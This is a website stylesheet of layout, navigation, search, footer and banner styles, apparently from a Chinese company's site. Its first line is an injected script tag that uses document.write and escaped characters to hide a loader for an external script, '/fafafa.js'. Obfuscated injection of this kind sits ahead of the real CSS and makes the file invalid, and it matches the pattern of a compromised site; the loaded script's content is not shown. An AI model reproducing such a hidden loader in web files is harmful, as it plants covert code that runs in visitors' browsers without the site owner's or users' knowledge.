<script>document.write(unescape("%3Cscript%20src%3D%22\u002f\u0066\u0061\u0066\u0061\u0066\u0061\u002e\u006a\u0073%22%20type%3D%27text/javascript%27%3E%3C/script%3E"));</script>* {
    padding: 0;
    margin: 0;
    outline: none;
    -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
}

body {
    font-size: 16px;
    line-height: 1.7;
    color: #333;
    background: #fff;
    font-family: \5FAE\8F6F\96C5\9ED1, arial, tahoma, Verdana, sans-serif;
}

body,
html {
    width: 100%;
    position: relative;
    height: 100%;
}

.flex-box-center {
    display: flex;
    justify-content: center;
    align-items: center;
}

.flex-box-center-column {
    display: flex;
    justify-content: center;
    align-items: center;
    flex-flow: column;
}

.flex-box-content-between {
    display: flex;
    justify-content: space-between;
    align-items: center;
}


/*增加的布局样式*/

.flex-col {
    display: flex;
    flex-direction: column;
}

.flex-row {
    display: flex;
    flex-direction: row;
}

.justify-between {
    justify-content: space-between;
}

.flex-space-between-info {
    display: flex;
    flex-direction: row;
    justify-content: space-between;
}

.icon {
    width: 1em;
    height: 1em;
    vertical-align: -0.15em;
    fill: currentColor;
    overflow: hidden;
    margin-right: 8px;
}

ul,
li {
    list-style: none;
}

a {
    text-decoration: none;
    color: #333;
    cursor: pointer;
}

a:hover {
    color: #F7B334;
}

.base-header {
    position: relative;
    z-index: 22;
    width: 100%;
}

.base-header-top {
    height: 48px;
    text-align: right;
    width: 100%;
    line-height: 48px;
    transition: all .3s ease;
}

.base-in {
    width: 1180px;
    margin: 0 auto;
}

.base-in>a {
    text-decoration: none;
    font-size: 14px;
    color: #666666;
    line-height: 22px;
    margin-right: .2rem;
}

.base-in>a:last-child {
    margin-right: 0;
}

.base-link {
    display: inline-block;
    min-width: 160px;
    height: 28px;
    line-height: 28px !important;
    text-align: center;
    background: #0073E5;
    border-radius: 4px;
    color: #fff !important;
    text-align: center !important;
    padding: 0 10px;
}

.base-tabs-item {
    height: 80px;
    display: flex;
    align-items: center;
    justify-content: space-between;
}

.base-tabs .logo {
    width: 190px;
    height: 60px;
}

.base-tabs {
    transition: all .3s ease;
}

.base-tabs li {
    text-decoration: none;
    font-size: 16px;
    font-weight: bold;
    color: #333333;
    margin-right: .64rem;
    position: relative;
    display: inline-block;
    cursor: pointer;
    line-height: 78px;
}

.base-menu-left {
    line-height: normal;
}

.base-tabs li:last-child {
    margin-right: 0;
}

.base-tabs li:nth-child(4) .base-menu {
    left: -3rem;
    display: none;
}

.base-tabs li:nth-child(5) .base-menu {
    left: -5rem;
    display: none;
}

.base-tabs .active {
    font-weight: bold;
}

.base-tabs li::before,
.nav .base-tabs a::before {
    content: "";
    position: absolute;
    left: 0;
    bottom: 0;
    height: 3px;
    background: #F7B334;
    border-radius: 2px 2px 0px 0px;
    transition: all ease-in-out 0.4s;
    width: 0;
}

.base-tabs li:hover::before,
.nav .base-tabs a:hover::before {
    width: 100%;
}

.active {
    color: #F7B334 !important;
}

.active::before {
    content: "";
    position: absolute;
    left: 0;
    bottom: 0;
    height: 3px;
    background: #F7B334;
    border-radius: 2px 2px 0px 0px;
    transition: all ease-in-out 0.4s;
    display: inline-block;
    width: 100% !important;
}

.base-tabs li:hover .base-menu {
    opacity: 1;
    transform: translateY(0);
    visibility: visible;
}

.base-menu {
    display: block;
    position: absolute;
    left: 0;
    width: 6.5rem;
    min-height: 3rem;
    background: #FFFFFF;
    padding: .4rem;
    transition: all ease-in-out 0.4s;
    opacity: 0;
    transform: translateY(50px);
    visibility: hidden;
}

.base-menu-item {
    display: flex;
}

.base-menu-item a {
    font-size: 16px;
    color: #333333 !important;
}

.base-item-link {
    line-height: .40rem;
    margin-bottom: 8px;
}

.base-menu-left img {
    width: 2.4rem;
    height: 1.6rem;
    object-fit: cover;
    margin-right: .6rem;
}

.base-menu-left-title {
    font-size: 16px;
    color: #333333;
    line-height: 32px;
    margin-top: .2rem;
}

.base-content {
    position: relative;
}

.base-tabs li:hover,
.base-menu-item a:hover {
    color: #F7B334 !important;
}

.base-content img {
    position: relative;
    width: 100%;
    height: 500px;
    object-fit: cover;
}

@keyframes bannerHover {
    0% {
        height: 0;
    }
    100% {
        height: 600px;
    }
}

.base-search {
    width: 100%;
    top: 60px;
    display: none;
    position: absolute;
    background-color: #fff;
}

.home .base-search {
    top: 40px;
}

.base-search-main {
    width: 780px;
    height: 56px;
    margin: 20px auto 10px auto;
    position: relative;
    display: flex;
    align-items: center;
}

.search-icon {
    position: absolute;
    left: 14px;
    color: #F7B334;
    top: 14px;
}

.btn-close {
    margin-left: 20px;
    background: #D8D8D8;
    color: #fff;
    width: 24px;
    height: 24px;
    border-radius: 50%;
    text-align: center;
    font-size: 14px;
    display: inline-block;
    line-height: 24px;
    cursor: pointer;
}

.base-search-ipt {
    padding: 0 40px;
    width: 640px;
    height: 54px;
    border-radius: 4px 0px 0px 4px;
    border: none;
    background-color: #fef7ef;
}

.base-search-btn {
    display: inline-block;
    text-align: center;
    line-height: 56px;
    width: 100px;
    height: 56px;
    line-height: 56px;
    background: #F7B334;
    border-radius: 0px 8px 8px 0px;
    color: #fff !important;
    font-size: 16px;
    margin-left: -5px;
}

.nav {
    height: 60px;
    display: flex;
    justify-content: space-between;
    align-items: center;
    color: #666;
    background: #fff;
    box-shadow: inset 0px -1px 0px 0px #D8D8D8;
}

.nav .base-tabs a {
    margin-right: .64rem;
    line-height: 60px;
    position: relative;
    font-size: 16px;
    font-weight: bold;
}

.nav .base-tabs .active::before,
.nav .base-tabs a::before {
    bottom: -23px;
}

.nav-active {
    color: #333;
}

.btn-menu {
    font-size: 14px;
}

.content {
    font-size: 16px;
    color: #333333;
    line-height: 32px;
}

.title {
    font-size: 36px;
    font-weight: bold;
    color: #333333;
    line-height: 42px;
    text-align: center;
    padding: 120px 0 64px 0;
}

.base-content .base-content-tabs {
    position: absolute;
    top: 1.6rem;
    left: 3.7rem;
}

.base-content .title {
    font-size: .48rem;
    font-weight: bold;
    color: #FFFFFF;
    line-height: .56rem;
    margin-bottom: .4rem;
}

.base-content .tabs {
    width: 4.4rem;
    display: flex;
    justify-content: space-between;
    flex-wrap: wrap;
}

.base-content a {
    color: #fff;
    font-size: 20px;
    font-weight: bold;
    color: #B8C8E2;
    line-height: 28px;
    text-decoration: none;
    position: relative;
    margin-right: .4rem;
}

.base-content a:nth-child(4n) {
    margin-right: 0;
}

.base-content a:nth-child(n+5) {
    margin-top: 24px;
}

.base-content .select {
    color: #fff;
    text-decoration: underline !important;
}

.base-content a:hover {
    color: #fff;
}

.base-bottom {
    width: 100%;
    background: #272727;
    display: flex;
    flex-flow: column;
    justify-content: center;
    padding-top: 90px;
}

.base-bottom-content {
    display: flex;
    justify-content: space-between;
    padding-bottom: .64rem;
}

.base-bottom-top {
    height: 176px;
    box-shadow: inset 0px -1px 0px 0px #666666;
    padding-top: 80px;
}

.base-bottom-logo {
    width: 190px;
    height: 62px;
    margin-bottom: 25px;
}

.weixin {
    margin-top: 10px;
    width: 120px;
}

.weixin img {
    width: 100%;
    margin-bottom: 20px;
}

.weixin-title {
    font-size: 14px;
    color: #FFFFFF;
    line-height: 19px;
    text-align: center;
}

.info {
    width: 248px;
}

.base-bottom-logo {
    width: 146px;
    height: 48px;
    margin: 0 0 20px 0;
}

.phone {
    font-size: 20px;
    color: #F7B334;
    line-height: 28px;
    margin-bottom: 20px;
    display: flex;
    align-items: center;
}

.email,
.address {
    font-size: 14px;
    color: #999;
    line-height: 22px;
    margin-bottom: 20px;
    display: flex;
}

.email:last-child {
    align-items: start;
}

.phone-icon {
    background: url(/en/image/font1.png) center center no-repeat;
    background-size: 100% 100%;
    width: 16px;
    height: 16px;
    margin-right: .18rem;
}

.email-icon {
    background: url(/en/image/font2.png) center center no-repeat;
    background-size: 100% 100%;
    width: 16px;
    height: 16px;
    margin-right: .18rem;
}

.add-icon {
    background: url(/en/image/font3.png) center center no-repeat;
    background-size: 100% 100%;
    width: 16px;
    height: 16px;
    margin: 2px .18rem 0 0;
}

.ic-lable {
    width: calc(100% - 32px);
}

.more {
    margin-top: 24px;
}

.more-t {
    font-size: 16px;
    font-weight: bold;
    color: #FFFFFF;
    line-height: 24px;
    margin-bottom: 20px;
}

.more-list {
    display: flex;
    flex-flow: column;
    font-size: 14px;
    line-height: 32px;
}

.more-list a {
    color: #9E9E9E;
    font-size: 14px !important;
    text-wrap: nowrap;
}

.more-list div {
    text-decoration: none;
    color: #666666;
}

.more-list a:hover {
    color: #F7B334;
}

.more-label {
    width: 1.6rem;
    font-size: 14px;
    color: #999999;
    line-height: 24px;
    margin-bottom: .2rem;
}

.base-sup {
    width: 100%;
    height: 64px;
    background: #2f2f2f;
    font-size: 14px;
    color: #666666;
    line-height: 22px;
    display: flex;
    align-items: center;
}

.base-sup a {
    color: #666;
}

.base-sup-l {
    display: flex;
    align-items: center;
    justify-content: space-between;
}

.base-title {
    font-size: .32rem;
    width: 100%;
    font-weight: bold;
    color: #333333;
    line-height: .48rem;
    margin: 1.2rem 0 .4rem 0;
    width: 672px;
}

.base-desc {
    font-size: 16px;
    margin-bottom: .8rem;
    color: #666666;
    line-height: 32px;
}

.box-item {
    width: 100%;
    background: #F9FAFC;
    border-radius: 12px;
    border: 1px solid #E0EDF9;
}

.box-item:last-child {
    margin-right: 0 !important;
}

.box-item-top {
    display: flex;
    align-items: center;
    padding: .2rem 0 0 .3rem;
}

.box-item-title {
    font-size: 16px;
    font-weight: bold;
    color: #0073E5;
    line-height: 30px;
}

.box-item-logo {
    width: .48rem;
    height: .48rem;
    background: #0073E5;
    margin-right: .2rem;
    border-radius: 50%;
}

.box-item-desc {
    font-size: .14rem;
    color: #666;
    line-height: .3rem;
    padding: .2rem .3rem .3rem .3rem;
    text-align: justify;
}

.box-item-desc .RCMS_EDITOR p span {
    line-height: .24rem;
}

.box-item-cover {
    width: 100%;
    height: 2.48rem;
    border-radius: .12rem .12rem 0 0;
}

.box-br {
    width: .3rem;
    height: 0.04rem;
    background: #F99C34;
    margin: .2rem 0 0 .3rem;
}

:root {
    --width: 100%;
    --widthL: -100%
}

.toTop {
    display: none;
}

@keyframes move {
    0% {
        transform: translateX(0);
    }
    100% {
        transform: translateX(-1760px);
    }
}

@keyframes move1 {
    0% {
        transform: translateX(0)
    }
    100% {
        transform: translateX(1760px)
    }
}

.weixin_bg {
    background: url(/en/image/weixin.png) center center no-repeat;
    background-size: cover;
    width: 48px;
    height: 48px;
    cursor: pointer;
}

.iphoneMenu,
.base-header-top-iphone {
    display: none;
}

.menu {
    opacity: 0;
    position: fixed;
    width: 100%;
    height: 100%;
    z-index: -1;
    transform: translateX(90%);
    transition: all ease 0.4s;
    top: 0;
    background-color: #fff;
}

.menuActive {
    transform: none;
    opacity: 1;
    z-index: 300;
    background: rgba(0, 0, 0, 0.6);
}

.menu-right-list {
    height: 100%;
    margin-top: 48px;
}

.menu-content {
    width: 50%;
    height: 100%;
    position: absolute;
    background-color: #fff;
    right: 0;
    padding: .3rem .4rem 0 .8rem;
}

.menu-right-title {
    font-size: 20px;
    font-weight: bold;
    color: #333333;
    line-height: 30px;
}

.menu-right-nav {
    margin: .30rem 0 .48rem 0;
    font-size: 16px;
    color: #666666;
    line-height: 30px;
}

.menu-right-nav a {
    margin-right: .48rem;
}

.menu-close {
    cursor: pointer;
    width: 48px;
    height: 48px;
    line-height: 48px;
    background: #F7B334;
    border-radius: 50%;
    color: #fff;
    font-size: 20px;
    text-align: center;
    position: absolute;
    right: .4rem;
}

.second-nav ul li {
    height: 56px;
    line-height: 56px;
    margin-bottom: 64px;
}

.second-nav-active a {
    color: #FFFFFF !important;
    background: #F7B334 !important;
    border: 1px solid #F7B334 !important;
}

.second-nav ul li:first-child a {
    border-radius: 8px 0 0 8px;
}

.second-nav ul li:last-child a {
    border-radius: 0 8px 8px 0;
}

.second-nav ul li a {
    font-weight: bold;
    font-size: 18px;
    color: #333333;
    display: inline-block;
    height: 56px;
    line-height: 56px;
    background: #FFFFFF;
    border: 1px solid #E8E8E8;
    padding: 0 24px;
}

.content-info {
    position: relative;
    padding-bottom: 120px;
}

.RCMS_EDITOR img {
    max-width: 100% !important;
}

.base-content {
    position: relative;
}

.banne-name {
    font-weight: bold;
    font-size: 48px;
    color: #FFFFFF;
    line-height: 56px;
    position: absolute;
    bottom: 80px;
    left: 19.27%;
    z-index: 2;
}

.base-item-link .active::before {
    display: none;
}

.logo_w {
    display: none;
}<!--0.00023984909057617-->